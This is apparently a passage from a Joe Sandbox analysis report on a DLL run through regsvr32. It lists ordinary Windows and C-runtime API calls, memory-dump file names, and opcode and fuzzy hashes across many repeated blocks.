                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC672107CE), ref: 00007FFC6721030D
                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC672107CE), ref: 00007FFC67210410
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CompareErrorInfoLastString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3723911898-0
                                                                                                                                      • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                      • Instruction ID: 86a2fb40965edba633244821bd666b2fdd0564cd9e58f64f96d6803bb72aedc5
                                                                                                                                      • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                      • Instruction Fuzzy Hash: FFE1CE22A1C2EACAEB309F1295642BD6792FF4479CF544A35DB5D47BC4CE3CA960C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3466867069-0
                                                                                                                                      • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                      • Instruction ID: c5a53df40a136091db50d3de0866a7c297aae233f7c93117029b513a2e5c16d0
                                                                                                                                      • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                      • Instruction Fuzzy Hash: 56716A61E0D67EC0FE69972B947D2792391BF8178CF580D3AC65E067A1DE2CE981C270
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1575098132-0
                                                                                                                                      • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                      • Instruction ID: f913d34fe6680110fcb1844ccc1ecb5f8279f448a46d4f6d9208267db7a3f9c6
                                                                                                                                      • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                      • Instruction Fuzzy Hash: C1311E61A0F5AAC5FE68EA6391B97785391BF80B8CF041936DA0E066C6DF1CF840C371
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorInfoLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 189849726-0
                                                                                                                                      • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                      • Instruction ID: 054eb8509c1adf1ef1f6ffdbfbddd9d6864259e5c56891af12047e1d0d58a477
                                                                                                                                      • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                      • Instruction Fuzzy Hash: 9AB1CE32A0D6A6C6DB20CF26A4686AD77A0FF48748F84453AEB9C87791DF3DD441C720
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 994105223-0
                                                                                                                                      • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                      • Instruction ID: 6803aeee69c878eda0eb1eb3293baa1020fcc36553a082fc36a24e7bc997a09b
                                                                                                                                      • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                      • Instruction Fuzzy Hash: B141A061A0D36AC5EA249B23A56C43963A2FF95B98F144838EB4E13B55CF3CE491C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1012874770-0
                                                                                                                                      • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                      • Instruction ID: d9d7d4e427d0f1b00f60d0fd7eab10c2855fc80a90eb850c4f4b868153049491
                                                                                                                                      • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                      • Instruction Fuzzy Hash: EC410E32A0E5AAC4EF65DE23D4687BC2391FF94B48F045835DA0D4A696DF2DA891C370
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3451773520-0
                                                                                                                                      • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                      • Instruction ID: 78bfd753ed21f32ca76bc09e2b638388291907f5fdda921f72e23f62deff1fe8
                                                                                                                                      • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                      • Instruction Fuzzy Hash: 76A1A125A2D66AC1EA30EB27A93427A6391FF4079CF148E35DB1D477C5DE3CA4A5C320
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E292
                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E2B1
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E356
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3B5
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3F0
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E42C
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E46C
                                                                                                                                      • free.LIBCMT ref: 00007FFC6720E47A
                                                                                                                                      • free.LIBCMT ref: 00007FFC6720E49C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$Infofree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1638741495-0
                                                                                                                                      • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                      • Instruction ID: 683be95795da3bb7d9b7e6c286b8749650ea76b48df82a2f768b56c826c909d2
                                                                                                                                      • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                      • Instruction Fuzzy Hash: 9461C272E0C696C6EB24AB22986417967D1FF94BACF544E35EA1D06BD4DF3CD481C230
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2551688548-0
                                                                                                                                      • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                      • Instruction ID: 032e001c45ada41f79255e530f6fc9f976bd5ccbe6ab0b8a42dfad5ae4f1e029
                                                                                                                                      • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                      • Instruction Fuzzy Hash: 3141C361A0D66AC1EA50DB13E8A853963D4FF8878CF440839EA4D037A6EF3CE455C734
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67208F94
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67208FA6
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67209006
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC672090BC
                                                                                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC672090D3
                                                                                                                                      • free.LIBCMT ref: 00007FFC672090E4
                                                                                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFC67209206), ref: 00007FFC67209161
                                                                                                                                      • free.LIBCMT ref: 00007FFC67209171
                                                                                                                                        • Part of subcall function 00007FFC6720E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E292
                                                                                                                                        • Part of subcall function 00007FFC6720E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E2B1
                                                                                                                                        • Part of subcall function 00007FFC6720E23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3B5
                                                                                                                                        • Part of subcall function 00007FFC6720E23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFC6720E3F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535580693-0
                                                                                                                                      • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                      • Instruction ID: 534fd92187c48978ea740d6e71e95e105d54b9a65204254025a3d2c0a9bdd80a
                                                                                                                                      • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                      • Instruction Fuzzy Hash: 7361A332B0C66ACAD7209F22D4684696792FF447ECB540A35EB5E13B94DE3CE851C760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetStartupInfoA.KERNEL32 ref: 00007FFC6720377D
                                                                                                                                        • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                      • GetFileType.KERNEL32 ref: 00007FFC672038FA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInfoSleepStartupType
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 1527402494-2766056989
                                                                                                                                      • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                      • Instruction ID: 843ca19614f9f6da8a459a1f6b15aeb923e7380ec7612dff8978ca94394702c6
                                                                                                                                      • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                      • Instruction Fuzzy Hash: AB917F21A1C6AAC5E7108B36D468A282B95FF06778F658B39C67D463D2DF7CE841C331
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$_getptd
                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                      • API String ID: 3432092939-699404926
                                                                                                                                      • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                      • Instruction ID: d67ce30f608ca7fa6cfafb4f7a3bb79c9ed3016a1a954372b19d08f49fd1b952
                                                                                                                                      • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                      • Instruction Fuzzy Hash: 2571B0A6D0C6AAC1F7B6C617846C37A27D5AF8475CF254937CA5E026E1DE6CE880C331
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _FF_MSGBANNER.LIBCMT ref: 00007FFC67206ADF
                                                                                                                                        • Part of subcall function 00007FFC67206F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC67206FCF
                                                                                                                                        • Part of subcall function 00007FFC6720334C: ExitProcess.KERNEL32 ref: 00007FFC6720335B
                                                                                                                                        • Part of subcall function 00007FFC6720309C: Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                      • _errno.LIBCMT ref: 00007FFC67206B21
                                                                                                                                      • _lock.LIBCMT ref: 00007FFC67206B35
                                                                                                                                      • free.LIBCMT ref: 00007FFC67206B57
                                                                                                                                      • _errno.LIBCMT ref: 00007FFC67206B5C
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8,?,?,?,00007FFC67202DFF), ref: 00007FFC67206B82
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1354249094-0
                                                                                                                                      • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                      • Instruction ID: ad0452957be9908b80c4d8b44907178ba69dd09937a749d825be939232b8653c
                                                                                                                                      • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                      • Instruction Fuzzy Hash: 4821A160E0D66AC2F660AB1394A837A6394FF84788F045835E64E466C2DF3CE480C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202D7A
                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202D88
                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202DE0
                                                                                                                                        • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC67202DB4
                                                                                                                                      • free.LIBCMT ref: 00007FFC67202DD7
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFC67202DC8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3106088686-0
                                                                                                                                      • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                      • Instruction ID: 817eb6cd2b673df0c74823c08ad2bfab1e5142a93ab16b6b6f0cc942041f36e1
                                                                                                                                      • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                      • Instruction Fuzzy Hash: 72017565B0DB5AC6FA14DB67946813863E2FF49758B044A34DA2D063D1EE3CE844C230
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1012874770-0
